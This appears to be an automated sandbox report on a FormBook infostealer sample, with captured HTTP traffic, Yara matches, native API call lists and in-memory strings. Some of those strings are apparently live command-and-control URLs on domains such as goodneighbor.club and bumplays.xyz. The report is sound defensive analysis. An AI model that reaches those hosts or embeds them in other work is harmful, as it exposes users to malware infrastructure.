73 3d 22 63 6f 6e 74 5f 61 75 72 61 5f 32 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2e 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 page</title> <link rel='stylesheet' href='https://fonts.googleapis.com/css?family=Lato:400,100,300'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="cont_principal"><div class="cont_error"> <h1>Oops</h1> <p>The Page you're looking for isn't here.</p> </div><div class="cont_aura_1"></div><div class="cont_aura_2"></div></div><!-- partial --> <script src="./script.js"></script></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 17 Jul 2024 07:12:13 GMTServer: ApacheContent-Length: 551Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 70 61 67 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4c 61 74 6f 3a 34 30 30 2c 31 30 30 2c 33 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 5f 70 72 69 6e 63 69 70 61 6c 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 5f 65 72 72 6f 72 22 3e 0a 20 20 0a 3c 68 31 3e 4f 6f 70 73 3c 2f 68 31 3e 20 20 0a 20 20 3c 70 3e 54 68 65 20 50 61 67 65 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 69 73 6e 27 74 20 68 65 72 65 2e 3c 2f 70 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 5f 61 75 72 61 5f 31 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 5f 61 75 72 61 5f 32 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2e 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 page</title> <link rel='stylesheet' href='https://fonts.googleapis.com/css?family=Lato:400,100,300'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="cont_principal"><div class="cont_error"> <h1>Oops</h1> <p>The Page you're looking for isn't here.</p> </div><div class="cont_aura_1"></div><div class="cont_aura_2"></div></div><!-- partial --> <script src="./script.js"></script></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 17 Jul 2024 07:12:15 GMTServer: ApacheContent-Length: 551Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 70 61 67 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4c 61 74 6f 3a 34 30 30 2c 31 30 30 2c 33 30 30 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 5f 70 72 69 6e 63 69 70 61 6c 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 5f 65 72 72 6f 72 22 3e 0a 20 20 0a 3c 68 31 3e 4f 6f 70 73 3c 2f 68 31 3e 20 20 0a 20 20 3c 70 3e 54 68 65 20 50 61 67 65 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 69 73 6e 27 74 20 68 65 72 65 2e 3c 2f 70 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 5f 61 75 72 61 5f 31 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 5f 61 75 72 61 5f 32 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 2e 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 page</title> <link rel='stylesheet' href='https://fonts.googleapis.com/css?family=Lato:400,100,300'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="cont_principal"><div class="cont_error"> <h1>Oops</h1> <p>The Page you're looking for isn't here.</p> </div><div class="cont_aura_1"></div><div class="cont_aura_2"></div></div><!-- partial --> <script src="./script.js"></script></body></html>

Source: rundll32.exe, 00000006.00000002.72356870195.00000000067FA000.00000004.10000000.00040000.00000000.sdmp, udkVsCOVUH.exe, 00000007.00000002.72356714391.00000000049EA000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://goodneighbor.club/arws/?4vLHGxWP=V9NjEKlopNjCanAb5dj3yxp9dUMc8CQ72iFMSnNpqje1X2xP/Psizb4oTPkU
Source: Petromasila 16072024.exe	String found in binary or memory: http://services.sunlightlabs.com/api
Source: udkVsCOVUH.exe, 00000007.00000002.72355077117.0000000001441000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.bumplays.xyz
Source: udkVsCOVUH.exe, 00000007.00000002.72355077117.0000000001441000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.bumplays.xyz/a0qs/
Source: udkVsCOVUH.exe, 00000007.00000002.72356714391.0000000004D0E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.yummie-food.online/r9oc/?4vLHGxWP=WL056cvEyZIj6gByFShPScW0LOQ73QJfUv2rUxG28YbpHWXWZfwRrVk
Source: rundll32.exe, 00000006.00000003.68106814497.0000000007F73000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: rundll32.exe, 00000006.00000003.68106814497.0000000007F73000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 5190-M986.6.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: rundll32.exe, 00000006.00000002.72358552918.0000000007FD9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.68106814497.0000000007F73000.00000004.00000020.00020000.00000000.sdmp, 5190-M986.6.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 5190-M986.6.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: rundll32.exe, 00000006.00000002.72356870195.00000000061B2000.00000004.10000000.00040000.00000000.sdmp, udkVsCOVUH.exe, 00000007.00000002.72356714391.00000000043A2000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com/css?family=Lato:400
Source: rundll32.exe, 00000006.00000002.72356870195.0000000005CFC000.00000004.10000000.00040000.00000000.sdmp, udkVsCOVUH.exe, 00000007.00000002.72356714391.0000000003EEC000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com/css?family=Open
Source: rundll32.exe, 00000006.00000002.72354565366.0000000003120000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.68027045763.000000000313C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.68030894913.000000000313C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.68089428887.000000000313C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.72354565366.000000000313C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.68033574139.000000000313C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.68017690002.000000000313C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/
Source: rundll32.exe, 00000006.00000002.72354565366.0000000003120000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.68027045763.000000000313C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.68030894913.000000000313C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.68089428887.000000000313C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.72354565366.000000000313C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.68033574139.000000000313C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.68017690002.000000000313C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com//
Source: rundll32.exe, 00000006.00000002.72354565366.0000000003120000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/https://login.live.com/
Source: rundll32.exe, 00000006.00000002.72354565366.0000000003120000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/https://login.live.com/h
Source: rundll32.exe, 00000006.00000002.72354565366.0000000003120000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.68027045763.000000000313C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.68030894913.000000000313C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.68089428887.000000000313C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.72354565366.000000000313C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.68033574139.000000000313C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.68017690002.000000000313C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/v104
Source: rundll32.exe, 00000006.00000003.68017900353.0000000003108000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=1
Source: rundll32.exe, 00000006.00000002.72354565366.00000000030DC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdlcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=16
Source: rundll32.exe, 00000006.00000002.72358552918.0000000007FD9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.68106814497.0000000007F73000.00000004.00000020.00020000.00000000.sdmp, 5190-M986.6.dr	String found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
Source: rundll32.exe, 00000006.00000002.72358552918.0000000007FD9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.68106814497.0000000007F73000.00000004.00000020.00020000.00000000.sdmp, 5190-M986.6.dr	String found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: rundll32.exe, 00000006.00000002.72356870195.00000000056B4000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 00000006.00000002.72358370007.0000000007C10000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.72356870195.0000000005E8E000.00000004.10000000.00040000.00000000.sdmp, udkVsCOVUH.exe, 00000007.00000002.72356714391.000000000407E000.00000004.00000001.00040000.00000000.sdmp, udkVsCOVUH.exe, 00000007.00000002.72356714391.00000000038A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.68226266210.000000000E2E4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: rundll32.exe, 00000006.00000003.68106814497.0000000007F73000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/favicon.ico
Source: rundll32.exe, 00000006.00000002.72358552918.0000000007FD9000.00000004.00000020.00020000.00000000.sdmp, 5190-M986.6.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: Petromasila 16072024.exe	String found in binary or memory: https://www.google.com/search?q=

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.67761026249.00000000016A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.72354462859.0000000003040000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.72354109038.0000000002B40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.67758522682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.72355680444.0000000002FF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.72355583181.0000000004AB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.67761207375.0000000001780000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.67761026249.00000000016A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.72354462859.0000000003040000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.72354109038.0000000002B40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.67758522682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.72355680444.0000000002FF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.72355583181.0000000004AB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.67761207375.0000000001780000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0042BEA3 NtClose,	4_2_0042BEA3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013434E0 NtCreateMutant,LdrInitializeThunk,	4_2_013434E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01342B90 NtFreeVirtualMemory,LdrInitializeThunk,	4_2_01342B90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01342A80 NtClose,LdrInitializeThunk,	4_2_01342A80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01342D10 NtQuerySystemInformation,LdrInitializeThunk,	4_2_01342D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01344260 NtSetContextThread,	4_2_01344260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01344570 NtSuspendThread,	4_2_01344570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013429F0 NtReadFile,	4_2_013429F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013429D0 NtWaitForSingleObject,	4_2_013429D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_013438D0 NtGetContextThread,	4_2_013438D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01342B20 NtQueryInformationProcess,	4_2_01342B20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01342B10 NtAllocateVirtualMemory,	4_2_01342B10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01342B00 NtQueryValueKey,	4_2_01342B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01342B80 NtCreateKey,	4_2_01342B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01342BE0 NtQueryVirtualMemory,	4_2_01342BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01342BC0 NtQueryInformationToken,	4_2_01342BC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01342A10 NtWriteFile,	4_2_01342A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01342AA0 NtQueryInformationFile,	4_2_01342AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01342AC0 NtEnumerateValueKey,	4_2_01342AC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01342D50 NtWriteVirtualMemory,	4_2_01342D50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01342DA0 NtReadVirtualMemory,	4_2_01342DA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01342DC0 NtAdjustPrivilegesToken,	4_2_01342DC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01342C30 NtMapViewOfSection,	4_2_01342C30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01343C30 NtOpenProcessToken,	4_2_01343C30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01342C20 NtSetInformationFile,	4_2_01342C20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01342C10 NtOpenProcess,	4_2_01342C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01342C50 NtUnmapViewOfSection,	4_2_01342C50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01343C90 NtOpenThread,	4_2_01343C90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01342CF0 NtDelayExecution,	4_2_01342CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01342CD0 NtEnumerateKey,	4_2_01342CD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01342F30 NtOpenDirectoryObject,	4_2_01342F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01342F00 NtCreateFile,	4_2_01342F00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01342FB0 NtSetValueKey,	4_2_01342FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01342E00 NtQueueApcThread,	4_2_01342E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01342E50 NtCreateSection,	4_2_01342E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01342EB0 NtProtectVirtualMemory,	4_2_01342EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01342E80 NtCreateProcessEx,	4_2_01342E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01342ED0 NtResumeThread,	4_2_01342ED0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_01342EC0 NtQuerySection,	4_2_01342EC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04D134E0 NtCreateMutant,LdrInitializeThunk,	6_2_04D134E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04D14570 NtSuspendThread,LdrInitializeThunk,	6_2_04D14570
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04D14260 NtSetContextThread,LdrInitializeThunk,	6_2_04D14260
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04D12CF0 NtDelayExecution,LdrInitializeThunk,	6_2_04D12CF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04D12C50 NtUnmapViewOfSection,LdrInitializeThunk,	6_2_04D12C50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04D12C30 NtMapViewOfSection,LdrInitializeThunk,	6_2_04D12C30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04D12DA0 NtReadVirtualMemory,LdrInitializeThunk,	6_2_04D12DA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04D12D10 NtQuerySystemInformation,LdrInitializeThunk,	6_2_04D12D10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04D12ED0 NtResumeThread,LdrInitializeThunk,	6_2_04D12ED0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04D12E50 NtCreateSection,LdrInitializeThunk,	6_2_04D12E50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04D12E00 NtQueueApcThread,LdrInitializeThunk,	6_2_04D12E00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04D12F00 NtCreateFile,LdrInitializeThunk,	6_2_04D12F00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04D138D0 NtGetContextThread,LdrInitializeThunk,	6_2_04D138D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04D129F0 NtReadFile,LdrInitializeThunk,	6_2_04D129F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04D12AC0 NtEnumerateValueKey,LdrInitializeThunk,	6_2_04D12AC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04D12A80 NtClose,LdrInitializeThunk,	6_2_04D12A80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04D12A10 NtWriteFile,LdrInitializeThunk,	6_2_04D12A10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04D12BC0 NtQueryInformationToken,LdrInitializeThunk,	6_2_04D12BC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04D12B90 NtFreeVirtualMemory,LdrInitializeThunk,	6_2_04D12B90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04D12B80 NtCreateKey,LdrInitializeThunk,	6_2_04D12B80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04D12B10 NtAllocateVirtualMemory,LdrInitializeThunk,	6_2_04D12B10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04D12B00 NtQueryValueKey,LdrInitializeThunk,	6_2_04D12B00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04D12CD0 NtEnumerateKey,	6_2_04D12CD0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04D13C90 NtOpenThread,	6_2_04D13C90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04D12C10 NtOpenProcess,	6_2_04D12C10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04D13C30 NtOpenProcessToken,	6_2_04D13C30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04D12C20 NtSetInformationFile,	6_2_04D12C20
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04D12DC0 NtAdjustPrivilegesToken,	6_2_04D12DC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04D12D50 NtWriteVirtualMemory,	6_2_04D12D50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04D12EC0 NtQuerySection,	6_2_04D12EC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04D12E80 NtCreateProcessEx,	6_2_04D12E80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04D12EB0 NtProtectVirtualMemory,	6_2_04D12EB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04D12FB0 NtSetValueKey,	6_2_04D12FB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04D12F30 NtOpenDirectoryObject,	6_2_04D12F30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04D129D0 NtWaitForSingleObject,	6_2_04D129D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04D12AA0 NtQueryInformationFile,	6_2_04D12AA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04D12BE0 NtQueryVirtualMemory,	6_2_04D12BE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04D12B20 NtQueryInformationProcess,	6_2_04D12B20
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_02B68A10 NtCreateFile,	6_2_02B68A10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_02B68B80 NtReadFile,	6_2_02B68B80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_02B68E70 NtAllocateVirtualMemory,	6_2_02B68E70
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_02B68C70 NtDeleteFile,	6_2_02B68C70
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_02B68D10 NtClose,	6_2_02B68D10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04BBF8E2 NtMapViewOfSection,	6_2_04BBF8E2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04BBF942 NtMapViewOfSection,	6_2_04BBF942

Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Code function: 0_2_024D4738	0_2_024D4738
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Code function: 0_2_024D04E8	0_2_024D04E8
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Code function: 0_2_024D1168	0_2_024D1168
Source: C:\Users\user\Desktop\Petromasila 16072024.exe	Code function: 0_2_024D4728	0_2_024D4728
